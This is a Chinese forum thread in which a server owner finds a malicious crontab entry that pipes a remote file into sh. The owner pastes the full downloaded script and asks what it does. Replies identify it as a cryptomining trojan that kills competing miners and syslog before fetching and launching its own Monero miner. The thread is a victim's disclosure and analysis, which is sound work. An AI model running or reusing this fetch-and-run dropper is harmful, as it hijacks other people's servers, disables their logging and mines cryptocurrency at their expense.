1
Symo OP 问题找到了, crontab 里面有这么一行
`curl http://194.87.239.7/common/logo.jpg|sh` 文件下载下来是这样的 ``` #!/bin/sh rm -rf /tmp/index_bak.* rm -rf /tmp/httpd.conf.* rm -rf /tmp/httpd.conf pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4 pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df pkill -f cpuloadtest pkill -f crypto-pool pkill -f xmr pkill -f prohash pkill -f monero pkill -f miner pkill -f nanopool pkill -f minergate pkill rsyslog pkill syslog pkill -f "/tmp/apache" pkill -f "/tmp/httpd.conf" ps auxf|grep -v grep|grep "/tmp/apache"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/tmp/httpd.conf"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9 ps -fe|grep 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R |grep -v grep if [ $? -ne 0 ] then echo "start process....." cat /proc/cpuinfo|grep aes>/dev/null if [ $? -ne 1 ] then curl -o /tmp/cputest http://194.87.239.7/common/cputest.jpg wget -O /tmp/cputest http://194.87.239.7/common/cputest.jpg else curl -o /tmp/cputest http://194.87.239.7/common/cputest_na.jpg wget -O /tmp/cputest http://194.87.239.7/common/cputest_na.jpg fi chmod +x /tmp/cputest nohup /tmp/cputest -B -a cryptonight -o stratum+tcp://212.129.44.156:80 -u 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R -p x >/dev/null else echo "runing....." fi ``` 这个脚本是有什么用意么? |
2
ryd994 2017-04-06 10:30:09 +08:00 via Android
哈哈哈哈真黑,先把别人的挖矿软件干掉
再开自己的 |
3
xss 2017-04-06 10:31:18 +08:00
挖矿木马....
|
4
holyzhou 2017-04-06 10:51:00 +08:00
我能说 这脚本写的真是丑嘛。
|
5
mingl0280 2017-04-06 12:27:45 +08:00
挖矿马 233333
|
6
expy 2017-04-06 12:44:26 +08:00
同行是大敌,名字叫 cputest 也是机智 233
|
7
AlisaDestiny 2017-04-06 13:13:43 +08:00
真是长见识了。好奇的是这个 cron task 是如何写进去的。
|
8
kmahyyg 2017-04-06 13:16:25 +08:00 via Android
3f 正解
|